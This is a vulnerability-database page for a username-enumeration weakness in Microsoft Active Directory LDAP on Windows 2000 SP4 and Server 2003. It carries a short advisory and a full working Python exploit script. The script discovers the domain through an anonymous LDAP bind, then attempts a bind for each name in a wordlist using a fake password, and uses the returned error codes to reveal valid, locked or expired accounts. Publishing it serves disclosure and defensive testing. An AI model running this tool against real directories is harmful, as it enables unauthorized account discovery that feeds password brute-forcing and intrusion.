Vulners
Lucene search
Microsoft Active Directory LDAP Server Username Enumeration Weakness
source: http://www.securityfocus.com/bid/32305/info
Microsoft Active Directory is prone to a username-enumeration weakness because of a design error in the application when verifying user-supplied input.
Attackers may exploit this weakness to discern valid usernames. This may aid them in brute-force password cracking or other attacks.
This issue affects Active Directory on these versions of Windows:
Windows 2000 SP4
Windows Server 2003 SP1 and SP2
Other versions may also be affected.
#!/usr/bin/env python
'''
Microsoft Windows Active Directory LDAP Server Information
Disclosure Vulnerability Exploit
(c) 2008 Bernardo Damele A. G. <[email protected]>
License: GPLv2
Version: 0.1
References:
* http://labs.portcullis.co.uk/application/ldapuserenum/
* http://www.portcullis-security.com/40.php
Successfully tested on:
* Microsoft 2000 Server Service Pack 4 + Update Rollup 1 Full Patched at
October 2008
* Microsoft 2003 Standard Service Pack 2 Full Patched at October 2008
'''
import os
import re
import sys
import traceback
try:
import ldap
except:
print 'ERROR: this tool requires python-ldap library to be installed, get it '
print 'from http://python-ldap.sourceforge.net/ or apt-get install python-ldap'
sys.exit(1)
from optparse import OptionError
from optparse import OptionParser
def LDAPconnect(target, port=389, version=ldap.VERSION3):
try:
# Connect to the remote LDAP server
l = ldap.open(target, port)
# Set the LDAP protocol version
l.protocol_version = version
except:
print 'ERROR: unable to connect to the remote LDAP server'
return l
def LDAPinfo(target, info=False):
# Connect to the remote LDAP server
l = LDAPconnect(target)
# Retrieved machine domain
domain = None
# Set search requirements and directory
baseDN = ''
searchScope = ldap.SCOPE_BASE
resultSet = []
# Retrieve all LDAP attributes
retrieveAttributes = None
searchFilter = 'objectClass=*'
try:
# Get LDAP information
ldapResultId = l.search(baseDN, searchScope, searchFilter, retrieveAttributes)
except ldap.SERVER_DOWN, _:
print 'ERROR: unable to connect to the remote LDAP server'
return domain
while True:
resultType, resultData = l.result(ldapResultId, 0)
if not resultData:
break
elif resultType == ldap.RES_SEARCH_ENTRY:
resultSet.append(resultData)
results = resultSet[0][0][1]
if results:
if info:
print '\n[*] LDAP information:'
else:
print 'Unable to perform LDAP information gathering, probably anonymous LDAP bind is forbidden'
domain = raw_input('Please, provide the machine domain yourself: ')
return domain
# Print LDAP information
for key, values in results.items():
if info:
print '\t[*] %s' % key
for value in values:
if info:
print '\t\t[*] %s' % value
domainRegExp = re.search('DC=([\w\.]+)', value, re.I)
if domainRegExp:
domain = domainRegExp.group(1)
print
return domain
def LDAPusersEnum(target, domain):
# Enumerated users
users = {}
# Path to users list
usersFilePath = './users.txt'
# Active Directory LDAP bind errors
# Source: http://www-01.ibm.com/support/docview.wss?rs=688&uid=swg21290631
errorCodes = {
#'525': 'user not found',
'52e': 'invalid credentials',
'530': 'not permitted to logon at this time',
'531': 'not permitted to logon at this workstation',
'532': 'password expired',
'533': 'account disabled',
'701': 'account expired',
'773': 'user must reset password',
'775': 'user account locked',
}
# Check if users list exists
if not os.path.exists(usersFilePath):
print 'ERROR: users list file %s not found' % usersFilePath
return
print 'Going to enumerate users taking \'%s\' file as input\n' % usersFilePath
# Load users from a text file
fd = open(usersFilePath, 'r')
for user in fd.readlines():
user = user.replace('\n', '').replace('\r', '')
# Skip empty and commented lines
if not user or user[0] == '#':
continue
# Set search requirements and directory
baseDN = '%s@%s' % (user, domain)
password = 'UnexistingPassword'
try:
# Connect and perform an LDAP bind with an invalid password and
# request results
l = LDAPconnect(target)
num = l.bind_s(baseDN, password)
result = l.result(num)
except ldap.SERVER_DOWN, _:
print 'ERROR: unable to connect to the remote LDAP server'
return
except:
# Python LDAP library only handles a number of exception, not
# all of the possible ones so we except globally and parse the
# exception message to distinguish between existing and
# unexisting user
errorMessage = str(traceback.format_exc())
detectedErrorCode = re.search(' data ([\w]+),', errorMessage)
if not detectedErrorCode:
continue
detectedErrorCode = detectedErrorCode.group(1).lower()
if detectedErrorCode in errorCodes.keys():
users[user] = detectedErrorCode
if users:
print '[*] Enumerated users:'
for user, detectedErrorCode in users.items():
print '\t[*] User: %s' % user
print '\t\t[*] LDAP error code: %s' % detectedErrorCode
print '\t\t[*] LDAP message: %s' % errorCodes[detectedErrorCode]
else:
print '[*] No users enumerated'
if __name__ == '__main__':
usage = '%s [-i] -t <target>' % sys.argv[0]
parser = OptionParser(usage=usage, version='0.1')
try:
parser.add_option('-d', dest='descr', action='store_true', help='show description and exit')
parser.add_option('-t', dest='target', help='target IP or hostname')
parser.add_option('-i', '--info', dest='info', action='store_true',
help='show LDAP information gathering results')
(args, _) = parser.parse_args()
if not args.descr and not args.target:
parser.error('Missing the target, -h for help')
except (OptionError, TypeError), e:
parser.error(e)
if args.descr:
print __doc__
sys.exit(0)
domain = LDAPinfo(args.target, args.info)
if domain:
domain = str(domain).upper()
LDAPusersEnum(args.target, domain)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1